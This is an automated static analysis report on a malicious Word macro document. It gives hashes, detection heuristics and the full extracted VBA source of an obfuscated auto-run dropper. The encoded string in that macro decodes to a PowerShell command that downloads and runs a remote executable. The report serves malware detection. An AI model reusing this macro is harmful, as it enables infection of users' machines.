Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 4bcd65296d8e336b…

MALICIOUS

Office (OLE)

Size: 91.0 KB
Created: 2017-01-19 15:05:00
Authoring application: Microsoft Office Word
First seen: 2017-02-23
MD5: b4c690e70f33282f525d3efaf86b7150
SHA-1: 6b2ed6af8138e4e363848395ac4fff41c092bbc0
SHA-256: 4bcd65296d8e336badf54b91a8e92eb1ca5a3916e3b400c5dbf9dee49e025330
Risk score: 230

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample is a Microsoft Word document containing a malicious VBA macro. The macro is obfuscated: it assembles the name of the COM object it instantiates with CreateObject from string fragments at runtime and strips junk characters from an encoded string to rebuild the command it then executes through that object's Run method, indicating it is designed to download and run a second-stage payload. The ClamAV detection 'Doc.Dropper.Agent-5684006-0' further supports this dropper functionality. The decoded command invokes PowerShell, which is likely used to fetch and execute the payload.

Heuristics 7

  • ClamAV: Doc.Dropper.Agent-5684006-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-5684006-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
    'baconcaught salgattawgslgvwcxur
    Set nejgysjqgqjmro = CreateObject(Join(dieselstill, ""))
    'vkhnplvncpl umiycugqog
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    'baconcaught salgattawgslgvwcxur
    Set nejgysjqgqjmro = CreateObject(Join(dieselstill, ""))
    'vkhnplvncpl umiycugqog
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Attribute VB_Customizable = True
    Public Sub Document_Open()
    hobbyritual = "Jwk qhAJi3d9Qd3eQJnq Q-6nQ3oAXp9 3-kXeqp68 q9b3QyAXp6aAQs9Qs3 6(JqNqkeQ3wX-38OqbXj3eQc8t39 X6SAQy3sX9t8Ae6mX8.86N9eQtk.qW6eQXb9C3lkiXXeJnJ8tX)kq.X9D9oQXwQn9l3o9aAd36FAi6JlA6eQk(3Q'Q3hQt3qtXpQXs6:qq/k/9Xdk3.kfXi36lJeQb8oAAxX.33mqokQe6q/AAjQQz3wJs69i9bX.3QeAAxqQek'QQ,J'q%AT6E3qMXPX%A3\QX\Aqjkz6Xw8sXiqbX.Qe3x9e9'3Q)kk X&Ak QQr8ekAgXQ AQakdJ6d8 XH3KqqCkqU9\JA\QSQJo9fAAtXQwQaXQrQ9eQ\k\3C6klAqaksqJs6Xe3sk6\Xk\QmJ9s6cqf3ki3l9eQQ\kk\As3Jh9eJlXlqq\3\QoQpXXe8JnX3\Qk\Q6cQo3AmXmJaA6nQdkk QX/8 …
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://ns.adobe.com/xap/1.0/ - In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# - In document text (OLE body)
    • http://ns.adobe.com/camera-raw-settings/1.0/ - In document text (OLE body)
    • http://ns.adobe.com/photoshop/1.0/ - In document text (OLE body)
    • http://purl.org/dc/elements/1.1/ - In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/ - In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent# - In document text (OLE body)
    • http://www.iec.ch - In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main - In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 4157 bytes
SHA-256: 807c45ffcfbb0f262ab9776c431a69e59783d1c7898cbe8cdf4adf58be670c76
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public Sub Document_Open()
hobbyritual = "Jwk qhAJi3d9Qd3eQJnq Q-6nQ3oAXp9 3-kXeqp68 q9b3QyAXp6aAQs9Qs3 6(JqNqkeQ3wX-38OqbXj3eQc8t39 X6SAQy3sX9t8Ae6mX8.86N9eQtk.qW6eQXb9C3lkiXXeJnJ8tX)kq.X9D9oQXwQn9l3o9aAd36FAi6JlA6eQk(3Q'Q3hQt3qtXpQXs6:qq/k/9Xdk3.kfXi36lJeQb8oAAxX.33mqokQe6q/AAjQQz3wJs69i9bX.3QeAAxqQek'QQ,J'q%AT6E3qMXPX%A3\QX\Aqjkz6Xw8sXiqbX.Qe3x9e9'3Q)kk X&Ak QQr8ekAgXQ AQakdJ6d8 XH3KqqCkqU9\JA\QSQJo9fAAtXQwQaXQrQ9eQ\k\3C6klAqaksqJs6Xe3sk6\Xk\QmJ9s6cqf3ki3l9eQQ\kk\As3Jh9eJlXlqq\3\QoQpXXe8JnX3\Qk\Q6cQo3AmXmJaA6nQdkk QX/8d3 8J%JQTq3EQQMkP3q%3\9Q\Qqj6z8wXs8i9QbX6.qeq9xAekX A8/A9fkq kq&A 6eX8vXeknQXtQ8v9w3Qr83.3eJXx3qeJJ Q&A k3P9Ik8NQGJ Q6-9Xn3 X1695QJ 8q162AA7qX.X03X.30X9.AX1QX>A3nQuQl6 6X&X3 X%QqTQkEA"
Selection.TypeText ("It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout. The point of using Lorem Ipsum is that it has a more-or-less normal distribution of letters, as opposed to using 'Content here, content here', making it look like readable English." & vbCrLf)
Dim wzprvluiaes As String
wzprvluiaes = "wojwfvgqhrimuaxzwug"
Dim ceilingrobust As Long
ceilingrobust = 355

electricminute = Asc("G") - 71
jvsgyuvaujlfxfs = "6cXmqdQq.86e6QxqeJ Q9/JXck 6Qp63oJwA3e69r3JsQhXe3lQlQ3.QeXxQ9eAX kX-"
jvsgyuvaujlfxfs = jvsgyuvaujlfxfs & hobbyritual & "MQQPQ9%XX\9\3j3z8Xwkks6iX3b8.8e39xQ3e"
hobbyritual = ""
Dim dieselstill(1 To 5) As String
Dim dreamexhibit As String
dreamexhibit = "giraffegreat"
Dim aerobicrecipe As Long
aerobicrecipe = 992
dieselstill(1) = "wsc"
dieselstill(2) = "ri"
dieselstill(3) = "pt.s"
'cxcphptbfz jgqfsayqx
Dim blushdash As String
blushdash = "tevdthznc"
'vnzlvqtuencyezcup cglvilllatgmvgo
dieselstill(4) = "hel"
'morfqernj snjsrzkftbxahs
Dim foxgorilla As String
foxgorilla = "zpiuhfezgrguhjg"
'hobckoguceaookmaqrx crystalremove
dieselstill(5) = "l"
'jubbzdpmpabzfbdksgt riufcbrryoneeugn
Dim monthsoft As String
monthsoft = "fingerhelmet"
'baconcaught salgattawgslgvwcxur
Set nejgysjqgqjmro = CreateObject(Join(dieselstill, ""))
'vkhnplvncpl umiycugqog
Dim biologyphrase As String
biologyphrase = "kkkxzejcnxqo"
'akiummdmr bomblevel
For drzrikdutbrjzwzpqo = 1 To Len(jvsgyuvaujlfxfs)
'tfauvhutbfxtikwzgl mvowaztrbkowvftx
Dim bxcqzvyqrdcdposw As String
bxcqzvyqrdcdposw = "exchangespend"
'gardenlawn hhdfglucrfjyrduvods
pandarender = Mid(jvsgyuvaujlfxfs, drzrikdutbrjzwzpqo, 1)
Dim hvbobzasb As String
hvbobzasb = "hgjbphpwm"
Dim destroyseven As Long
destroyseven = 520
Dim almostsketch As String
almostsketch = "emmarrqzc"
Dim curtainproject As Long
curtainproject = 931
gcoeuohvy = "q69QX38QAk3XJ" Like "*" & pandarender & "*"
'blushchase evidenceprevent
Dim questionselect As String
questionselect = "developskirt"
'bpqwrfdazonhtgc hjfyavadnraldb
If Not gcoeuohvy Then
'castledish pqtvkxptxy
Dim arguecousin As String
arguecousin = "oldoutdoor"
'ovalsalon ndpwmlmagx
Dim brushsecond As String
brushsecond = "combinedog"
Dim cinnamonpalace As Long
cinnamonpalace = 737
hobbyritual = hobbyritual & pandarender
'cqtntdiijqrqsxg naturescheme
Dim buffalopatch As String
buffalopatch = "matswqkuizgmg"
'ppisayytdtbnfjxhkvm attracttask
End If
If drzrikdutbrjzwzpqo = Len(jvsgyuvaujlfxfs) Then
dumbindustry = nejgysjqgqjmro.Run(hobbyritual, electricminute)
'octobervendor eklrwqtoxr
Dim kdrxsfujjsydknwosi As String
kdrxsfujjsydknwosi = "ohkyitoqlgsfwmhb"
'hbvaocotnnrobzcsi againmesh
End If
'tenantwaste blossomrecall
Dim gasppermit As String
gasppermit = "adviceclock"
'aimseat peanutpudding
Dim pwtpsekrkeuszdq As String
pwtpsekrkeuszdq = "muffinurban"
Dim awegbybpbvai As Long
awegbybpbvai = 676
Next
'headhole foamsqueeze
Dim tcovgbztrspspyx As String
tcovgbztrspspyx = "nnykfizvhqo"
'smoudvqodmlwqjtxj enrichwave
End Sub